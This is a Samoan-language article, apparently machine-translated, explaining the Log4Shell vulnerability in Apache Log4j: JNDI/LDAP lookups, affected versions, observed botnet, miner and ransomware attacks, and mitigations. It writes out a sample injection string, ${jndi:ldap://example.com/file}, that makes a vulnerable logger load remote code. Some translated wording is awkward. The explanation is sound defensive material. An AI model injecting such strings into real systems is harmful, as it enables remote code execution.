Lisi o Mataupu[Natia][Fa'aali]
I le fa'ai'uga o Novema 2021, na matou maua ai se fa'amata'u tele i le saogalemu i luga ole laiga. O lenei fa'aogaina e ono a'afia ai le faitau miliona o masini komepiuta i le lalolagi atoa.
Ole ta'iala lea ile Log4j fa'aletonu ma pe fa'afefea e se fa'aletonu mamanu ua le amana'ia na tu'u ai le 90% o auaunaga faakomepiuta a le lalolagi e tatala e osofa'i.
Apache Log4j o se faʻaoga faʻapipiʻi faʻavae Java e faʻavaeina e le Apache Software Foundation. Na tusia muamua e Ceki Gülcü i le 2001, ua avea nei ma vaega o Apache Logging Services, o se poloketi a le Apache Software Foundation.
Kamupani i le salafa o le lalolagi e faʻaogaina le Log4j faletusi e mafai ai ona faʻapipiʻi a latou talosaga. O le mea moni, o le faletusi Java e matua tele lava, e mafai ona e mauaina i talosaga mai Amazon, Microsoft, Google, ma isi mea.
O le ta'uta'ua o le faletusi o lona uiga o so'o se fa'aletonu e ono tula'i mai i le tulafono e mafai ona tu'u ai le faitau miliona o komepiuta e tatala i le hacking. I le aso 24 o Novema 2021, a ao saogalemu Na maua e le tagata su'esu'e galue mo Alibaba se fa'aletonu mata'utia.
O le Log4j vulnerability, lea e taʻua foi o Log4Shell, sa i ai e aunoa ma se iloa talu mai le 2013. O le faʻafitauli na mafai ai e le au fai mea leaga ona faʻatautaia code i luga o faiga faʻaogaina Log4j. Na fa'ailoa fa'alaua'itele ia Tesema 9th, 2021
E ta'ua e le aufaipisinisi le faaletonu o le Log4Shell le sili ona vaivai i manatuaga talu ai nei.
I le vaiaso na sosoo ai ma le faʻasalalauina o le faʻafitauli, na maua ai e le cybersecurity team le faitau miliona o osofaʻiga. O nisi tagata suʻesuʻe na latou matauina se fua faatatau e sili atu i le selau osofaʻiga i le minute.
E faapefea ona galulue?
Ina ia malamalama pe aisea ua matua matautia ai le Log4Shell, e tatau ona tatou malamalama po o le a le mea e mafai ai.
O le Log4Shell vulnerability e mafai ai ona faʻatinoina tulafono faʻapitoa, o lona uiga e mafai e se tagata osofaʻi ona faʻatautaia soʻo se faʻatonuga poʻo se code i luga o se masini faʻatatau.
E faapefea ona ausia lenei mea?
Muamua, e tatau ona tatou malamalama po o le a le JNDI.
O le Java Naming and Directory Interface (JNDI) o se auaunaga Java e mafai ai e polokalame Java ona maua ma suʻe faʻamaumauga ma punaoa e ala i se igoa. E taua tele nei au'aunaga fa'atonu ona latou te tu'uina atu se seti fa'amaumauga o fa'amaumauga mo le au atia'e e faigofie ona fa'asino pe a fai tusi talosaga.
E mafai e le JNDI ona faʻaogaina faʻasalalauga eseese e maua ai se lisi patino. O se tasi o nei fa'atonuga o le Lightweight Directory Access Protocol, po'o le LDAP.
Pe a taina se manoa, ogalaau4j faia suiga o manoa pe a latou fetaiai ma fa'aaliga o le fomu ${prefix:name}
.
Faataitaiga, Text: ${java:version}
atonu o lo'o fa'amauina e pei o Tusitusiga: Java version 1.8.0_65. O ia ituaiga o sui e masani lava.
E mafai foi ona i ai a tatou faaupuga e pei o Text: ${jndi:ldap://example.com/file}
lea e fa'aogaina le JNDI system e utaina ai se mea Java mai se URL e ala i le LDAP protocol.
O lenei mea e utaina lelei ai faʻamatalaga e sau mai lena URL i totonu o le masini. Soʻo se tagata taʻavale e mafai ona faʻafeiloaʻi tulafono leaga i luga o se URL lautele ma faʻatali mo masini e faʻaoga Log4j e faʻapipiʻi ai.
Talu ai o mea o loʻo i totonu o faʻamatalaga ogalaau o loʻo i ai faʻamatalaga e pulea e le tagata, e mafai e tagata taʻavale ona faʻaofi a latou lava faʻamatalaga JNDI e faʻasino i le LDAP servers latou te pulea. O nei 'au'aunaga LDAP e mafai ona tumu i mea leaga Java e mafai e le JNDI ona fa'atinoina e ala i le fa'aletonu.
O le a le mea e sili atu ai le leaga o lenei mea e le afaina pe o le talosaga o se itu-aumau po'o se talosaga a le tagata o tausia.
Afai lava o loʻo i ai se auala mo le logger e faitau ai le tulafono leaga a le tagata osofaʻi, o loʻo tatala pea le talosaga i le faʻaogaina.
O ai e aʻafia?
O le fa'aletonu e a'afia ai faiga uma ma 'au'aunaga e fa'aogaina le APache Log4j, fa'atasi ai ma fa'aliliuga 2.0 e o'o atu ma aofia ai le 2.14.1.
Ua fautuaina e le tele o tagata tomai faapitoa i le puipuiga e faapea o le tulaga vaivai e ono aafia ai le tele o talosaga e faaaoga ai Java.
O le fa'aletonu na maua muamua i le ta'aloga vitio a Microsoft a le Minecraft. Ua una'ia e Microsoft a latou tagata fa'aoga e fa'aleleia a latou polokalame Java edition Minecraft e puipuia ai so'o se lamatiaga.
Jen Easterly, le Faatonu o Cybersecurity and Infrastructure Security Agency (CISA) fai mai o tagata faʻatau e iai matafaioi tele e puipuia ai tagata fa'ai'uga mai tagata fai mea leaga o lo'o fa'aogaina lenei fa'aletonu.
"E tatau foʻi ona fesoʻotaʻi tagata faʻatau ma a latou tagata faʻatau ina ia mautinoa e iloa e tagata faʻaaogaina o latou oloa o loʻo i ai lenei faʻafitauli ma e tatau ona faʻamuamua faʻafouga polokalame."
Ua lipotia mai ua amata nei osofaiga. Symantec, o se kamupani e tuʻuina atu le cybersecurity software, ua matauina le tele o numera o osofaʻiga.
O nisi nei o faʻataʻitaʻiga o ituaiga osofaʻiga na maua e tagata suʻesuʻe:
- botnets
Botnets o se fesoʻotaʻiga o komepiuta o loʻo i lalo o le pule a se pati osofaʻi e tasi. Latou te fesoasoani i le faia o osofaʻiga DDoS, gaoi faʻamaumauga, ma isi faʻailoga. Sa matauina e le au su'esu'e le Muhstik botnet i atigi tusitusiga na sii mai i le Log4j exploit.
- XMRig Miner Trojan
O le XMRig o se faʻamatalaga mataʻutia o loʻo faʻaogaina e faʻaaogaina PPU e maina ai le Monero faʻailoga. Cybercriminals e mafai ona faʻapipiʻi le XMRig i masini a tagata ina ia mafai ai ona latou faʻaogaina lo latou malosi e faʻaogaina e aunoa ma lo latou iloa.
- Khonsari Ransomware
Ransomware e faasino i se ituaiga o malware ua fuafuaina e fa'ailoga faila i luga o se komepiuta. E mafai e tagata osofaʻi ona manaʻomia se totogi e faʻafesuiai mo le toe tuʻuina atu o avanoa i faila faʻailoga. Na maua e tagata suʻesuʻe le Khonsari ransomware i osofaʻiga a Log4Shell. Latou te tulimata'ia 'au'aunaga Windows ma fa'aoga le fa'avae .NET.
O le a le mea e sosoo ai?
Ua valoia e le au popoto e ono tele ni masina pe atonu foi o ni tausaga e faaleleia atoatoa ai le vevesi na aumaia e le Log4J vaivai.
O lenei faiga e aofia ai le fa'afouina o faiga uma e a'afia ma se fa'asologa fa'apipi'i. E tusa lava pe fa'apipi'i uma nei faiga, o lo'o i ai pea le fa'amata'u fa'amata'u o faitoto'a i tua atonu ua fa'aopoopoina e tagata ta'avale i le fa'amalama o lo'o tatala ai 'au'aunaga mo osofa'iga.
tele fofo ma faaitiitia i ai e puipuia ai talosaga mai le faʻaaogaina e lenei bug. O le Log4j version 2.15.0-rc1 fou na suia tulaga eseese e faʻaitiitia ai lenei faʻafitauli.
O vaega uma o lo'o fa'aogaina le JNDI o le a fa'aletonu ona o le fa'aletonu ma o su'esu'ega mamao fo'i ua fa'asaina. O le fa'agataina o le su'esu'ega i lau Log4j setup o le a fesoasoani e fa'aitiitia ai le lamatiaga o le fa'aogaina.
I fafo atu o le Log4j, o loʻo i ai pea le manaʻoga mo se fuafuaga lautele e puipuia ai faʻaoga avanoa.
I le amataga o Me, na tatalaina ai e le White House se faʻatonuga faʻapitoa lea na fa'amoemoe e fa'aleleia le puipuiga malu a le atunu'u. Na aofia ai ma se aiaiga mo se polokalama faakomepiuta o meafaitino (SBOM) lea o se pepa aloaia aloaia o loʻo i ai se lisi o mea uma e manaʻomia e fausia ai le talosaga.
E aofia ai vaega e pei o le Avanoa tatala afifi, fa'alagolago, ma API fa'aoga mo le atina'e. E ui o le manatu o SBOM e fesoasoani tele mo le manino, o le a fesoasoani moni i le tagata faʻatau?
O le fa'aleleia o fa'alagolago e ono fa'alavelave tele. E mafai e Kamupani ona filifili e totogi so'o se sala nai lo le fa'ama'imau taimi fa'aopoopo e su'e isi afifi. Masalo o nei SBOM o le a aoga pe a latou lautele e gata atu.
iʻuga
O le Log4j mataupu e sili atu nai lo na o se faʻafitauli faʻapitoa mo faʻalapotopotoga.
E tatau i taʻitaʻi pisinisi ona nofouta i faʻalavelave faʻafuaseʻi e mafai ona tupu pe a faʻalagolago a latou 'auʻaunaga, oloa, poʻo auaunaga i tulafono laiti latou te le tausia.
O le fa'alagolago i fa'amatalaga tatala ma isi vaega e sau i taimi uma ma sina fa'alavelave. E tatau i kamupani ona mafaufau i le faia o ni auala e faaitiitia ai lamatiaga a'o le'i aliali mai ni fa'amata'u fou.
Ole tele ole upegatafa'ilagi e fa'alagolago ile polokalama tatala-puna e tausia e le faitau afe o volenitia i le lalolagi atoa.
Afai tatou te mananaʻo e faʻatumauina le upega tafaʻilagi o se nofoaga saogalemu, e tatau i malo ma faʻalapotopotoga ona teu faʻafaigaluega i le faʻatupeina o taumafaiga faʻamatalaga tatala ma lala sooupu cybersecurity pei o CISA.
Tuua se tali